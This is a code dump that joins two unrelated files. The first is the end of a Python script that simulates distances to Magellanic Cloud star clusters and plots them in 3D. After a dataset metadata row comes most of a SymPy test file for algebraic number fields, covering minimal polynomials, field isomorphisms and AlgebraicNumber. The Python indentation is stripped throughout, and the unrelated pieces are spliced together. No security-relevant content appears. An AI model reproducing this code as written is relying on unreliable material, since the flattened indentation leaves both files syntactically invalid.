# # z' axis.
# x_min, y_min, z_min = inv_trans_eqs(0., 0, min_Z, theta, incl)
# x_max, y_max, z_max = inv_trans_eqs(0., 0, max_Z, theta, incl)
# ax.plot([x_min, x_max], [z_min, z_max], [y_min, y_max], ls='--', c='y')
# # Arrow head pointing in the positive z' direction.
# ax.quiver(x_max, z_max, y_max, x_max, z_max, y_max, length=0.1,
# arrow_length_ratio=.9, color='y')
# ax.text(x_max - .5, z_max, y_max, "z'", 'z', color='y')
ax.set_xlabel('x (Kpc)')
ax.set_ylabel('z (Kpc)')
ax.set_ylim(max_Y, min_Y)
ax.set_zlabel('y (Kpc)')
plt.colorbar(SC, shrink=0.9, aspect=25)
ax.axis('equal')
ax.axis('tight')
# This controls the initial orientation of the displayed 3D plot.
# ‘elev’ stores the elevation angle in the z plane. ‘azim’ stores the
# azimuth angle in the x,y plane.
ax.view_init(elev=0., azim=-90.)
plt.show()
# plt.savefig()
def main():
"""
"""
# Define inclination angles (i, Theta) (SMC first, LMC second).
# 'Theta' is the PA (position angle) measured from the North (positive
# y axis in van der Marel et al. 2002, Fig 3)
rot_angles = ((60, 150.), (30, 140.))
# Root path.
r_path = os.path.realpath(__file__)[:-30]
# Read input data for both galaxies from file (smc_data, lmc_data)
gal_data = readData.main(r_path)
for gal, gal_name in enumerate(['SMC', 'LMC']):
print("Generating data for {}".format(gal_name))
incl, Theta = rot_angles[gal]
# 'theta' is the position angle measured from the West (positive
# x axis), used by Eq (7) in van der Marel & Cioni (2001).
theta = Theta + 90.
# Center coordinates and distance for this galaxy.
gal_center, D_0, e_gal_dist = MCs_data.MCs_data(gal)
ra_0, dec_0 = gal_center.ra, gal_center.dec
# Center coordinates for observed clusters in this galaxy.
ra, dec = gal_data[gal]['ra'], gal_data[gal]['dec']
# Generate N random vertical distances (z'), in parsec.
z_prime = zDist(len(ra))
# Distance to clusters in parsecs.
D = invertDist(incl, theta, ra_0, dec_0, D_0, ra, dec, z_prime)
# Convert to distance moduli.
dist_mod = np.round(-5. + 5. * np.log10(D), 2)
# This line below uses the actual distance moduli found by ASteCA.
# dist_mod = gal_data[gal]['dist_mod']
# Random errors for distance moduli.
e_dm = np.round(np.random.uniform(.03, .09, len(ra)), 2)
# Store data in output file.
outData(gal_name, gal_data[gal], dist_mod, e_dm)
print("Output data stored")
# Obtain angular projected distance and position angle for the
# clusters in the galaxy.
rho, phi = rho_phi(ra, dec, gal_center)
cl_xyz = xyz_coords(rho, phi, D_0, dist_mod)
make_plot(gal_name, incl, theta, cl_xyz, dist_mod)
print("Plot saved.")
if __name__ == '__main__':
main()
| gpl-3.0 | -6,003,738,110,879,360,000 | 34.552448 | 79 | 0.564123 | false | 2.680728 | false | false | false |
wxgeo/geophar | wxgeometrie/sympy/polys/tests/test_numberfields.py | 4 | 28618 | """Tests for computational algebraic number field theory. """
from sympy import (S, Rational, Symbol, Poly, sqrt, I, oo, Tuple, expand,
pi, cos, sin, exp)
from sympy.utilities.pytest import raises, slow
from sympy.core.compatibility import range
from sympy.polys.numberfields import (
minimal_polynomial,
primitive_element,
is_isomorphism_possible,
field_isomorphism_pslq,
field_isomorphism,
to_number_field,
AlgebraicNumber,
isolate, IntervalPrinter,
)
from sympy.polys.polyerrors import (
IsomorphismFailed,
NotAlgebraic,
GeneratorsError,
)
from sympy.polys.polyclasses import DMP
from sympy.polys.domains import QQ
from sympy.polys.rootoftools import rootof
from sympy.polys.polytools import degree
from sympy.abc import x, y, z
Q = Rational
def test_minimal_polynomial():
assert minimal_polynomial(-7, x) == x + 7
assert minimal_polynomial(-1, x) == x + 1
assert minimal_polynomial( 0, x) == x
assert minimal_polynomial( 1, x) == x - 1
assert minimal_polynomial( 7, x) == x - 7
assert minimal_polynomial(sqrt(2), x) == x**2 - 2
assert minimal_polynomial(sqrt(5), x) == x**2 - 5
assert minimal_polynomial(sqrt(6), x) == x**2 - 6
assert minimal_polynomial(2*sqrt(2), x) == x**2 - 8
assert minimal_polynomial(3*sqrt(5), x) == x**2 - 45
assert minimal_polynomial(4*sqrt(6), x) == x**2 - 96
assert minimal_polynomial(2*sqrt(2) + 3, x) == x**2 - 6*x + 1
assert minimal_polynomial(3*sqrt(5) + 6, x) == x**2 - 12*x - 9
assert minimal_polynomial(4*sqrt(6) + 7, x) == x**2 - 14*x - 47
assert minimal_polynomial(2*sqrt(2) - 3, x) == x**2 + 6*x + 1
assert minimal_polynomial(3*sqrt(5) - 6, x) == x**2 + 12*x - 9
assert minimal_polynomial(4*sqrt(6) - 7, x) == x**2 + 14*x - 47
assert minimal_polynomial(sqrt(1 + sqrt(6)), x) == x**4 - 2*x**2 - 5
assert minimal_polynomial(sqrt(I + sqrt(6)), x) == x**8 - 10*x**4 + 49
assert minimal_polynomial(2*I + sqrt(2 + I), x) == x**4 + 4*x**2 + 8*x + 37
assert minimal_polynomial(sqrt(2) + sqrt(3), x) == x**4 - 10*x**2 + 1
assert minimal_polynomial(
sqrt(2) + sqrt(3) + sqrt(6), x) == x**4 - 22*x**2 - 48*x - 23
a = 1 - 9*sqrt(2) + 7*sqrt(3)
assert minimal_polynomial(
1/a, x) == 392*x**4 - 1232*x**3 + 612*x**2 + 4*x - 1
assert minimal_polynomial(
1/sqrt(a), x) == 392*x**8 - 1232*x**6 + 612*x**4 + 4*x**2 - 1
raises(NotAlgebraic, lambda: minimal_polynomial(oo, x))
raises(NotAlgebraic, lambda: minimal_polynomial(2**y, x))
raises(NotAlgebraic, lambda: minimal_polynomial(sin(1), x))
assert minimal_polynomial(sqrt(2)).dummy_eq(x**2 - 2)
assert minimal_polynomial(sqrt(2), x) == x**2 - 2
assert minimal_polynomial(sqrt(2), polys=True) == Poly(x**2 - 2)
assert minimal_polynomial(sqrt(2), x, polys=True) == Poly(x**2 - 2)
assert minimal_polynomial(sqrt(2), x, polys=True, compose=False) == Poly(x**2 - 2)
a = AlgebraicNumber(sqrt(2))
b = AlgebraicNumber(sqrt(3))
assert minimal_polynomial(a, x) == x**2 - 2
assert minimal_polynomial(b, x) == x**2 - 3
assert minimal_polynomial(a, x, polys=True) == Poly(x**2 - 2)
assert minimal_polynomial(b, x, polys=True) == Poly(x**2 - 3)
assert minimal_polynomial(sqrt(a/2 + 17), x) == 2*x**4 - 68*x**2 + 577
assert minimal_polynomial(sqrt(b/2 + 17), x) == 4*x**4 - 136*x**2 + 1153
a, b = sqrt(2)/3 + 7, AlgebraicNumber(sqrt(2)/3 + 7)
f = 81*x**8 - 2268*x**6 - 4536*x**5 + 22644*x**4 + 63216*x**3 - \
31608*x**2 - 189648*x + 141358
assert minimal_polynomial(sqrt(a) + sqrt(sqrt(a)), x) == f
assert minimal_polynomial(sqrt(b) + sqrt(sqrt(b)), x) == f
assert minimal_polynomial(
a**Q(3, 2), x) == 729*x**4 - 506898*x**2 + 84604519
# issue 5994
eq = S('''
-1/(800*sqrt(-1/240 + 1/(18000*(-1/17280000 +
sqrt(15)*I/28800000)**(1/3)) + 2*(-1/17280000 +
sqrt(15)*I/28800000)**(1/3)))''')
assert minimal_polynomial(eq, x) == 8000*x**2 - 1
ex = 1 + sqrt(2) + sqrt(3)
mp = minimal_polynomial(ex, x)
assert mp == x**4 - 4*x**3 - 4*x**2 + 16*x - 8
ex = 1/(1 + sqrt(2) + sqrt(3))
mp = minimal_polynomial(ex, x)
assert mp == 8*x**4 - 16*x**3 + 4*x**2 + 4*x - 1
p = (expand((1 + sqrt(2) - 2*sqrt(3) + sqrt(7))**3))**Rational(1, 3)
mp = minimal_polynomial(p, x)
assert mp == x**8 - 8*x**7 - 56*x**6 + 448*x**5 + 480*x**4 - 5056*x**3 + 1984*x**2 + 7424*x - 3008
p = expand((1 + sqrt(2) - 2*sqrt(3) + sqrt(7))**3)
mp = minimal_polynomial(p, x)
assert mp == x**8 - 512*x**7 - 118208*x**6 + 31131136*x**5 + 647362560*x**4 - 56026611712*x**3 + 116994310144*x**2 + 404854931456*x - 27216576512
assert minimal_polynomial(S("-sqrt(5)/2 - 1/2 + (-sqrt(5)/2 - 1/2)**2"), x) == x - 1
a = 1 + sqrt(2)
assert minimal_polynomial((a*sqrt(2) + a)**3, x) == x**2 - 198*x + 1
p = 1/(1 + sqrt(2) + sqrt(3))
assert minimal_polynomial(p, x, compose=False) == 8*x**4 - 16*x**3 + 4*x**2 + 4*x - 1
p = 2/(1 + sqrt(2) + sqrt(3))
assert minimal_polynomial(p, x, compose=False) == x**4 - 4*x**3 + 2*x**2 + 4*x - 2
assert minimal_polynomial(1 + sqrt(2)*I, x, compose=False) == x**2 - 2*x + 3
assert minimal_polynomial(1/(1 + sqrt(2)) + 1, x, compose=False) == x**2 - 2
assert minimal_polynomial(sqrt(2)*I + I*(1 + sqrt(2)), x,
compose=False) == x**4 + 18*x**2 + 49
# minimal polynomial of I
assert minimal_polynomial(I, x, domain=QQ.algebraic_field(I)) == x - I
K = QQ.algebraic_field(I*(sqrt(2) + 1))
assert minimal_polynomial(I, x, domain=K) == x - I
assert minimal_polynomial(I, x, domain=QQ) == x**2 + 1
assert minimal_polynomial(I, x, domain='QQ(y)') == x**2 + 1
def test_minimal_polynomial_hi_prec():
p = 1/sqrt(1 - 9*sqrt(2) + 7*sqrt(3) + S(1)/10**30)
mp = minimal_polynomial(p, x)
# checked with Wolfram Alpha
assert mp.coeff(x**6) == -1232000000000000000000000000001223999999999999999999999999999987999999999999999999999999999996000000000000000000000000000000
def test_minimal_polynomial_sq():
from sympy import Add, expand_multinomial
p = expand_multinomial((1 + 5*sqrt(2) + 2*sqrt(3))**3)
mp = minimal_polynomial(p**Rational(1, 3), x)
assert mp == x**4 - 4*x**3 - 118*x**2 + 244*x + 1321
p = expand_multinomial((1 + sqrt(2) - 2*sqrt(3) + sqrt(7))**3)
mp = minimal_polynomial(p**Rational(1, 3), x)
assert mp == x**8 - 8*x**7 - 56*x**6 + 448*x**5 + 480*x**4 - 5056*x**3 + 1984*x**2 + 7424*x - 3008
p = Add(*[sqrt(i) for i in range(1, 12)])
mp = minimal_polynomial(p, x)
assert mp.subs({x: 0}) == -71965773323122507776
def test_minpoly_compose():
# issue 6868
eq = S('''
-1/(800*sqrt(-1/240 + 1/(18000*(-1/17280000 +
sqrt(15)*I/28800000)**(1/3)) + 2*(-1/17280000 +
sqrt(15)*I/28800000)**(1/3)))''')
mp = minimal_polynomial(eq + 3, x)
assert mp == 8000*x**2 - 48000*x + 71999
# issue 5888
assert minimal_polynomial(exp(I*pi/8), x) == x**8 + 1
mp = minimal_polynomial(sin(pi/7) + sqrt(2), x)
assert mp == 4096*x**12 - 63488*x**10 + 351488*x**8 - 826496*x**6 + \
770912*x**4 - 268432*x**2 + 28561
mp = minimal_polynomial(cos(pi/7) + sqrt(2), x)
assert mp == 64*x**6 - 64*x**5 - 432*x**4 + 304*x**3 + 712*x**2 - \
232*x - 239
mp = minimal_polynomial(exp(I*pi/7) + sqrt(2), x)
assert mp == x**12 - 2*x**11 - 9*x**10 + 16*x**9 + 43*x**8 - 70*x**7 - 97*x**6 + 126*x**5 + 211*x**4 - 212*x**3 - 37*x**2 + 142*x + 127
mp = minimal_polynomial(sin(pi/7) + sqrt(2), x)
assert mp == 4096*x**12 - 63488*x**10 + 351488*x**8 - 826496*x**6 + \
770912*x**4 - 268432*x**2 + 28561
mp = minimal_polynomial(cos(pi/7) + sqrt(2), x)
assert mp == 64*x**6 - 64*x**5 - 432*x**4 + 304*x**3 + 712*x**2 - \
232*x - 239
mp = minimal_polynomial(exp(I*pi/7) + sqrt(2), x)
assert mp == x**12 - 2*x**11 - 9*x**10 + 16*x**9 + 43*x**8 - 70*x**7 - 97*x**6 + 126*x**5 + 211*x**4 - 212*x**3 - 37*x**2 + 142*x + 127
mp = minimal_polynomial(exp(2*I*pi/7), x)
assert mp == x**6 + x**5 + x**4 + x**3 + x**2 + x + 1
mp = minimal_polynomial(exp(2*I*pi/15), x)
assert mp == x**8 - x**7 + x**5 - x**4 + x**3 - x + 1
mp = minimal_polynomial(cos(2*pi/7), x)
assert mp == 8*x**3 + 4*x**2 - 4*x - 1
mp = minimal_polynomial(sin(2*pi/7), x)
ex = (5*cos(2*pi/7) - 7)/(9*cos(pi/7) - 5*cos(3*pi/7))
mp = minimal_polynomial(ex, x)
assert mp == x**3 + 2*x**2 - x - 1
assert minimal_polynomial(-1/(2*cos(pi/7)), x) == x**3 + 2*x**2 - x - 1
assert minimal_polynomial(sin(2*pi/15), x) == \
256*x**8 - 448*x**6 + 224*x**4 - 32*x**2 + 1
assert minimal_polynomial(sin(5*pi/14), x) == 8*x**3 - 4*x**2 - 4*x + 1
assert minimal_polynomial(cos(pi/15), x) == 16*x**4 + 8*x**3 - 16*x**2 - 8*x + 1
ex = rootof(x**3 +x*4 + 1, 0)
mp = minimal_polynomial(ex, x)
assert mp == x**3 + 4*x + 1
mp = minimal_polynomial(ex + 1, x)
assert mp == x**3 - 3*x**2 + 7*x - 4
assert minimal_polynomial(exp(I*pi/3), x) == x**2 - x + 1
assert minimal_polynomial(exp(I*pi/4), x) == x**4 + 1
assert minimal_polynomial(exp(I*pi/6), x) == x**4 - x**2 + 1
assert minimal_polynomial(exp(I*pi/9), x) == x**6 - x**3 + 1
assert minimal_polynomial(exp(I*pi/10), x) == x**8 - x**6 + x**4 - x**2 + 1
assert minimal_polynomial(sin(pi/9), x) == 64*x**6 - 96*x**4 + 36*x**2 - 3
assert minimal_polynomial(sin(pi/11), x) == 1024*x**10 - 2816*x**8 + \
2816*x**6 - 1232*x**4 + 220*x**2 - 11
ex = 2**Rational(1, 3)*exp(Rational(2, 3)*I*pi)
assert minimal_polynomial(ex, x) == x**3 - 2
raises(NotAlgebraic, lambda: minimal_polynomial(cos(pi*sqrt(2)), x))
raises(NotAlgebraic, lambda: minimal_polynomial(sin(pi*sqrt(2)), x))
raises(NotAlgebraic, lambda: minimal_polynomial(exp(I*pi*sqrt(2)), x))
# issue 5934
ex = 1/(-36000 - 7200*sqrt(5) + (12*sqrt(10)*sqrt(sqrt(5) + 5) +
24*sqrt(10)*sqrt(-sqrt(5) + 5))**2) + 1
raises(ZeroDivisionError, lambda: minimal_polynomial(ex, x))
ex = sqrt(1 + 2**Rational(1,3)) + sqrt(1 + 2**Rational(1,4)) + sqrt(2)
mp = minimal_polynomial(ex, x)
assert degree(mp) == 48 and mp.subs({x:0}) == -16630256576
def test_minpoly_issue_7113():
# see discussion in https://github.com/sympy/sympy/pull/2234
from sympy.simplify.simplify import nsimplify
r = nsimplify(pi, tolerance=0.000000001)
mp = minimal_polynomial(r, x)
assert mp == 1768292677839237920489538677417507171630859375*x**109 - \
2734577732179183863586489182929671773182898498218854181690460140337930774573792597743853652058046464
def test_minpoly_issue_7574():
ex = -(-1)**Rational(1, 3) + (-1)**Rational(2,3)
assert minimal_polynomial(ex, x) == x + 1
def test_primitive_element():
assert primitive_element([sqrt(2)], x) == (x**2 - 2, [1])
assert primitive_element(
[sqrt(2), sqrt(3)], x) == (x**4 - 10*x**2 + 1, [1, 1])
assert primitive_element([sqrt(2)], x, polys=True) == (Poly(x**2 - 2), [1])
assert primitive_element([sqrt(
2), sqrt(3)], x, polys=True) == (Poly(x**4 - 10*x**2 + 1), [1, 1])
assert primitive_element(
[sqrt(2)], x, ex=True) == (x**2 - 2, [1], [[1, 0]])
assert primitive_element([sqrt(2), sqrt(3)], x, ex=True) == \
(x**4 - 10*x**2 + 1, [1, 1], [[Q(1, 2), 0, -Q(9, 2), 0], [-
Q(1, 2), 0, Q(11, 2), 0]])
assert primitive_element(
[sqrt(2)], x, ex=True, polys=True) == (Poly(x**2 - 2), [1], [[1, 0]])
assert primitive_element([sqrt(2), sqrt(3)], x, ex=True, polys=True) == \
(Poly(x**4 - 10*x**2 + 1), [1, 1], [[Q(1, 2), 0, -Q(9, 2),
0], [-Q(1, 2), 0, Q(11, 2), 0]])
assert primitive_element([sqrt(2)], polys=True) == (Poly(x**2 - 2), [1])
raises(ValueError, lambda: primitive_element([], x, ex=False))
raises(ValueError, lambda: primitive_element([], x, ex=True))
# Issue 14117
a, b = I*sqrt(2*sqrt(2) + 3), I*sqrt(-2*sqrt(2) + 3)
assert primitive_element([a, b, I], x) == (x**4 + 6*x**2 + 1, [1, 0, 0])
def test_field_isomorphism_pslq():
a = AlgebraicNumber(I)
b = AlgebraicNumber(I*sqrt(3))
raises(NotImplementedError, lambda: field_isomorphism_pslq(a, b))
a = AlgebraicNumber(sqrt(2))
b = AlgebraicNumber(sqrt(3))
c = AlgebraicNumber(sqrt(7))
d = AlgebraicNumber(sqrt(2) + sqrt(3))
e = AlgebraicNumber(sqrt(2) + sqrt(3) + sqrt(7))
assert field_isomorphism_pslq(a, a) == [1, 0]
assert field_isomorphism_pslq(a, b) is None
assert field_isomorphism_pslq(a, c) is None
assert field_isomorphism_pslq(a, d) == [Q(1, 2), 0, -Q(9, 2), 0]
assert field_isomorphism_pslq(
a, e) == [Q(1, 80), 0, -Q(1, 2), 0, Q(59, 20), 0]
assert field_isomorphism_pslq(b, a) is None
assert field_isomorphism_pslq(b, b) == [1, 0]
assert field_isomorphism_pslq(b, c) is None
assert field_isomorphism_pslq(b, d) == [-Q(1, 2), 0, Q(11, 2), 0]
assert field_isomorphism_pslq(b, e) == [-Q(
3, 640), 0, Q(67, 320), 0, -Q(297, 160), 0, Q(313, 80), 0]
assert field_isomorphism_pslq(c, a) is None
assert field_isomorphism_pslq(c, b) is None
assert field_isomorphism_pslq(c, c) == [1, 0]
assert field_isomorphism_pslq(c, d) is None
assert field_isomorphism_pslq(c, e) == [Q(
3, 640), 0, -Q(71, 320), 0, Q(377, 160), 0, -Q(469, 80), 0]
assert field_isomorphism_pslq(d, a) is None
assert field_isomorphism_pslq(d, b) is None
assert field_isomorphism_pslq(d, c) is None
assert field_isomorphism_pslq(d, d) == [1, 0]
assert field_isomorphism_pslq(d, e) == [-Q(
3, 640), 0, Q(71, 320), 0, -Q(377, 160), 0, Q(549, 80), 0]
assert field_isomorphism_pslq(e, a) is None
assert field_isomorphism_pslq(e, b) is None
assert field_isomorphism_pslq(e, c) is None
assert field_isomorphism_pslq(e, d) is None
assert field_isomorphism_pslq(e, e) == [1, 0]
f = AlgebraicNumber(3*sqrt(2) + 8*sqrt(7) - 5)
assert field_isomorphism_pslq(
f, e) == [Q(3, 80), 0, -Q(139, 80), 0, Q(347, 20), 0, -Q(761, 20), -5]
def test_field_isomorphism():
assert field_isomorphism(3, sqrt(2)) == [3]
assert field_isomorphism( I*sqrt(3), I*sqrt(3)/2) == [ 2, 0]
assert field_isomorphism(-I*sqrt(3), I*sqrt(3)/2) == [-2, 0]
assert field_isomorphism( I*sqrt(3), -I*sqrt(3)/2) == [-2, 0]
assert field_isomorphism(-I*sqrt(3), -I*sqrt(3)/2) == [ 2, 0]
assert field_isomorphism( 2*I*sqrt(3)/7, 5*I*sqrt(3)/3) == [ S(6)/35, 0]
assert field_isomorphism(-2*I*sqrt(3)/7, 5*I*sqrt(3)/3) == [-S(6)/35, 0]
assert field_isomorphism( 2*I*sqrt(3)/7, -5*I*sqrt(3)/3) == [-S(6)/35, 0]
assert field_isomorphism(-2*I*sqrt(3)/7, -5*I*sqrt(3)/3) == [ S(6)/35, 0]
assert field_isomorphism(
2*I*sqrt(3)/7 + 27, 5*I*sqrt(3)/3) == [ S(6)/35, 27]
assert field_isomorphism(
-2*I*sqrt(3)/7 + 27, 5*I*sqrt(3)/3) == [-S(6)/35, 27]
assert field_isomorphism(
2*I*sqrt(3)/7 + 27, -5*I*sqrt(3)/3) == [-S(6)/35, 27]
assert field_isomorphism(
-2*I*sqrt(3)/7 + 27, -5*I*sqrt(3)/3) == [ S(6)/35, 27]
p = AlgebraicNumber( sqrt(2) + sqrt(3))
q = AlgebraicNumber(-sqrt(2) + sqrt(3))
r = AlgebraicNumber( sqrt(2) - sqrt(3))
s = AlgebraicNumber(-sqrt(2) - sqrt(3))
pos_coeffs = [ S(1)/2, S(0), -S(9)/2, S(0)]
neg_coeffs = [-S(1)/2, S(0), S(9)/2, S(0)]
a = AlgebraicNumber(sqrt(2))
assert is_isomorphism_possible(a, p) is True
assert is_isomorphism_possible(a, q) is True
assert is_isomorphism_possible(a, r) is True
assert is_isomorphism_possible(a, s) is True
assert field_isomorphism(a, p, fast=True) == pos_coeffs
assert field_isomorphism(a, q, fast=True) == neg_coeffs
assert field_isomorphism(a, r, fast=True) == pos_coeffs
assert field_isomorphism(a, s, fast=True) == neg_coeffs
assert field_isomorphism(a, p, fast=False) == pos_coeffs
assert field_isomorphism(a, q, fast=False) == neg_coeffs
assert field_isomorphism(a, r, fast=False) == pos_coeffs
assert field_isomorphism(a, s, fast=False) == neg_coeffs
a = AlgebraicNumber(-sqrt(2))
assert is_isomorphism_possible(a, p) is True
assert is_isomorphism_possible(a, q) is True
assert is_isomorphism_possible(a, r) is True
assert is_isomorphism_possible(a, s) is True
assert field_isomorphism(a, p, fast=True) == neg_coeffs
assert field_isomorphism(a, q, fast=True) == pos_coeffs
assert field_isomorphism(a, r, fast=True) == neg_coeffs
assert field_isomorphism(a, s, fast=True) == pos_coeffs
assert field_isomorphism(a, p, fast=False) == neg_coeffs
assert field_isomorphism(a, q, fast=False) == pos_coeffs
assert field_isomorphism(a, r, fast=False) == neg_coeffs
assert field_isomorphism(a, s, fast=False) == pos_coeffs
pos_coeffs = [ S(1)/2, S(0), -S(11)/2, S(0)]
neg_coeffs = [-S(1)/2, S(0), S(11)/2, S(0)]
a = AlgebraicNumber(sqrt(3))
assert is_isomorphism_possible(a, p) is True
assert is_isomorphism_possible(a, q) is True
assert is_isomorphism_possible(a, r) is True
assert is_isomorphism_possible(a, s) is True
assert field_isomorphism(a, p, fast=True) == neg_coeffs
assert field_isomorphism(a, q, fast=True) == neg_coeffs
assert field_isomorphism(a, r, fast=True) == pos_coeffs
assert field_isomorphism(a, s, fast=True) == pos_coeffs
assert field_isomorphism(a, p, fast=False) == neg_coeffs
assert field_isomorphism(a, q, fast=False) == neg_coeffs
assert field_isomorphism(a, r, fast=False) == pos_coeffs
assert field_isomorphism(a, s, fast=False) == pos_coeffs
a = AlgebraicNumber(-sqrt(3))
assert is_isomorphism_possible(a, p) is True
assert is_isomorphism_possible(a, q) is True
assert is_isomorphism_possible(a, r) is True
assert is_isomorphism_possible(a, s) is True
assert field_isomorphism(a, p, fast=True) == pos_coeffs
assert field_isomorphism(a, q, fast=True) == pos_coeffs
assert field_isomorphism(a, r, fast=True) == neg_coeffs
assert field_isomorphism(a, s, fast=True) == neg_coeffs
assert field_isomorphism(a, p, fast=False) == pos_coeffs
assert field_isomorphism(a, q, fast=False) == pos_coeffs
assert field_isomorphism(a, r, fast=False) == neg_coeffs
assert field_isomorphism(a, s, fast=False) == neg_coeffs
pos_coeffs = [ S(3)/2, S(0), -S(33)/2, -S(8)]
neg_coeffs = [-S(3)/2, S(0), S(33)/2, -S(8)]
a = AlgebraicNumber(3*sqrt(3) - 8)
assert is_isomorphism_possible(a, p) is True
assert is_isomorphism_possible(a, q) is True
assert is_isomorphism_possible(a, r) is True
assert is_isomorphism_possible(a, s) is True
assert field_isomorphism(a, p, fast=True) == neg_coeffs
assert field_isomorphism(a, q, fast=True) == neg_coeffs
assert field_isomorphism(a, r, fast=True) == pos_coeffs
assert field_isomorphism(a, s, fast=True) == pos_coeffs
assert field_isomorphism(a, p, fast=False) == neg_coeffs
assert field_isomorphism(a, q, fast=False) == neg_coeffs
assert field_isomorphism(a, r, fast=False) == pos_coeffs
assert field_isomorphism(a, s, fast=False) == pos_coeffs
a = AlgebraicNumber(3*sqrt(2) + 2*sqrt(3) + 1)
pos_1_coeffs = [ S(1)/2, S(0), -S(5)/2, S(1)]
neg_5_coeffs = [-S(5)/2, S(0), S(49)/2, S(1)]
pos_5_coeffs = [ S(5)/2, S(0), -S(49)/2, S(1)]
neg_1_coeffs = [-S(1)/2, S(0), S(5)/2, S(1)]
assert is_isomorphism_possible(a, p) is True
assert is_isomorphism_possible(a, q) is True
assert is_isomorphism_possible(a, r) is True
assert is_isomorphism_possible(a, s) is True
assert field_isomorphism(a, p, fast=True) == pos_1_coeffs
assert field_isomorphism(a, q, fast=True) == neg_5_coeffs
assert field_isomorphism(a, r, fast=True) == pos_5_coeffs
assert field_isomorphism(a, s, fast=True) == neg_1_coeffs
assert field_isomorphism(a, p, fast=False) == pos_1_coeffs
assert field_isomorphism(a, q, fast=False) == neg_5_coeffs
assert field_isomorphism(a, r, fast=False) == pos_5_coeffs
assert field_isomorphism(a, s, fast=False) == neg_1_coeffs
a = AlgebraicNumber(sqrt(2))
b = AlgebraicNumber(sqrt(3))
c = AlgebraicNumber(sqrt(7))
assert is_isomorphism_possible(a, b) is True
assert is_isomorphism_possible(b, a) is True
assert is_isomorphism_possible(c, p) is False
assert field_isomorphism(sqrt(2), sqrt(3), fast=True) is None
assert field_isomorphism(sqrt(3), sqrt(2), fast=True) is None
assert field_isomorphism(sqrt(2), sqrt(3), fast=False) is None
assert field_isomorphism(sqrt(3), sqrt(2), fast=False) is None
def test_to_number_field():
assert to_number_field(sqrt(2)) == AlgebraicNumber(sqrt(2))
assert to_number_field(
[sqrt(2), sqrt(3)]) == AlgebraicNumber(sqrt(2) + sqrt(3))
a = AlgebraicNumber(sqrt(2) + sqrt(3), [S(1)/2, S(0), -S(9)/2, S(0)])
assert to_number_field(sqrt(2), sqrt(2) + sqrt(3)) == a
assert to_number_field(sqrt(2), AlgebraicNumber(sqrt(2) + sqrt(3))) == a
raises(IsomorphismFailed, lambda: to_number_field(sqrt(2), sqrt(3)))
def test_AlgebraicNumber():
minpoly, root = x**2 - 2, sqrt(2)
a = AlgebraicNumber(root, gen=x)
assert a.rep == DMP([QQ(1), QQ(0)], QQ)
assert a.root == root
assert a.alias is None
assert a.minpoly == minpoly
assert a.is_number
assert a.is_aliased is False
assert a.coeffs() == [S(1), S(0)]
assert a.native_coeffs() == [QQ(1), QQ(0)]
a = AlgebraicNumber(root, gen=x, alias='y')
assert a.rep == DMP([QQ(1), QQ(0)], QQ)
assert a.root == root
assert a.alias == Symbol('y')
assert a.minpoly == minpoly
assert a.is_number
assert a.is_aliased is True
a = AlgebraicNumber(root, gen=x, alias=Symbol('y'))
assert a.rep == DMP([QQ(1), QQ(0)], QQ)
assert a.root == root
assert a.alias == Symbol('y')
assert a.minpoly == minpoly
assert a.is_number
assert a.is_aliased is True
assert AlgebraicNumber(sqrt(2), []).rep == DMP([], QQ)
assert AlgebraicNumber(sqrt(2), ()).rep == DMP([], QQ)
assert AlgebraicNumber(sqrt(2), (0, 0)).rep == DMP([], QQ)
assert AlgebraicNumber(sqrt(2), [8]).rep == DMP([QQ(8)], QQ)
assert AlgebraicNumber(sqrt(2), [S(8)/3]).rep == DMP([QQ(8, 3)], QQ)
assert AlgebraicNumber(sqrt(2), [7, 3]).rep == DMP([QQ(7), QQ(3)], QQ)
assert AlgebraicNumber(
sqrt(2), [S(7)/9, S(3)/2]).rep == DMP([QQ(7, 9), QQ(3, 2)], QQ)
assert AlgebraicNumber(sqrt(2), [1, 2, 3]).rep == DMP([QQ(2), QQ(5)], QQ)
a = AlgebraicNumber(AlgebraicNumber(root, gen=x), [1, 2])
assert a.rep == DMP([QQ(1), QQ(2)], QQ)
assert a.root == root
assert a.alias is None
assert a.minpoly == minpoly
assert a.is_number
assert a.is_aliased is False
assert a.coeffs() == [S(1), S(2)]
assert a.native_coeffs() == [QQ(1), QQ(2)]
a = AlgebraicNumber((minpoly, root), [1, 2])
assert a.rep == DMP([QQ(1), QQ(2)], QQ)
assert a.root == root
assert a.alias is None
assert a.minpoly == minpoly
assert a.is_number
assert a.is_aliased is False
a = AlgebraicNumber((Poly(minpoly), root), [1, 2])
assert a.rep == DMP([QQ(1), QQ(2)], QQ)
assert a.root == root
assert a.alias is None
assert a.minpoly == minpoly
assert a.is_number
assert a.is_aliased is False
assert AlgebraicNumber( sqrt(3)).rep == DMP([ QQ(1), QQ(0)], QQ)
assert AlgebraicNumber(-sqrt(3)).rep == DMP([ QQ(1), QQ(0)], QQ)
a = AlgebraicNumber(sqrt(2))
b = AlgebraicNumber(sqrt(2))
assert a == b
c = AlgebraicNumber(sqrt(2), gen=x)
d = AlgebraicNumber(sqrt(2), gen=x)
assert a == b
assert a == c
a = AlgebraicNumber(sqrt(2), [1, 2])
b = AlgebraicNumber(sqrt(2), [1, 3])
assert a != b and a != sqrt(2) + 3
assert (a == x) is False and (a != x) is True
a = AlgebraicNumber(sqrt(2), [1, 0])
b = AlgebraicNumber(sqrt(2), [1, 0], alias=y)
assert a.as_poly(x) == Poly(x)
assert b.as_poly() == Poly(y)
assert a.as_expr() == sqrt(2)
assert a.as_expr(x) == x
assert b.as_expr() == sqrt(2)
assert b.as_expr(x) == x
a = AlgebraicNumber(sqrt(2), [2, 3])
b = AlgebraicNumber(sqrt(2), [2, 3], alias=y)
p = a.as_poly()
assert p == Poly(2*p.gen + 3)
assert a.as_poly(x) == Poly(2*x + 3)
assert b.as_poly() == Poly(2*y + 3)
assert a.as_expr() == 2*sqrt(2) + 3
assert a.as_expr(x) == 2*x + 3
assert b.as_expr() == 2*sqrt(2) + 3
assert b.as_expr(x) == 2*x + 3
a = AlgebraicNumber(sqrt(2))
b = to_number_field(sqrt(2))
assert a.args == b.args == (sqrt(2), Tuple(1, 0))
b = AlgebraicNumber(sqrt(2), alias='alpha')
assert b.args == (sqrt(2), Tuple(1, 0), Symbol('alpha'))
a = AlgebraicNumber(sqrt(2), [1, 2, 3])
assert a.args == (sqrt(2), Tuple(1, 2, 3))
def test_to_algebraic_integer():
a = AlgebraicNumber(sqrt(3), gen=x).to_algebraic_integer()
assert a.minpoly == x**2 - 3
assert a.root == sqrt(3)
